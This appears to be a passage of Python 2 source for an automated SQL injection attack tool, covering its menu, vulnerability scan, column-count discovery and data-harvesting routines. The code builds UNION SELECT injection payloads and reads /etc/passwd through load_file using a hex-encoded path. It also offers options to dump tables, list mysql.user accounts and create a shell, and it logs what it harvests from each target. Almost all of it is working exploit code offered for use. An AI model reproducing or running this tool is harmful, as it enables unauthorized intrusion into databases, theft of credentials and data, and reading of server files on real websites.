print "3 - Show databases" print "4 - Show tables from the a DB" print "5 - Show columns from the a table of the DB" print "\n[mysql.user]\n" print "6 - Show users" print "\n[Others]\n" print "7 - Show details" print "8 - Dump data" print "9 - Fuzz Files with load_file" print "10 - Load files with load_file" print "11 - Create Shell" print "12 - Show log" print "13 - Change target" print "14 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) men() elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) men() elif op == 3: showdbs(page,bypass) men() elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) men() elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) men() elif op == 6: mysqluser(page,bypass) men() elif op == 7: more(page,bypass) men() elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) men() elif op == 9: 
fuzz(page,bypass) men() elif op == 10: fuzzfile(page,bypass) men() elif op == 11: into(page,bypass) men() elif op == 12: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 13: sta() elif op == 14: sys.exit(1) else: menu(page,bypass) except: menu(page,bypass) def more(web,passx): pass1,pass2 = bypass(passx) otraweb = web print "\n[+] Searching more data\n" hextest = "0x2f6574632f706173737764" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) savefile("logs/"+gethost(web)+".txt","") print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") codetres = toma(web2) if (re.findall("ERTOR854",codetres)): print "[+] load_file() : on" savefile("logs/"+gethost(web)+".txt","[+] load_file() : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code 
= toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n") menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" reiniciar() def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2) if not code==codedos: print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" op = raw_input("\n[+] Scan anyway y/n : ") if op == "y": findlength(web,passx) elif op == "n": reiniciar() else: reiniciar() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") if (re.findall("hackman",web,re.I)): menu(web,bypasx) else: try: scan(web,bypasx) except: print "\n[-] Web offline" reiniciar() installer() sta() #The End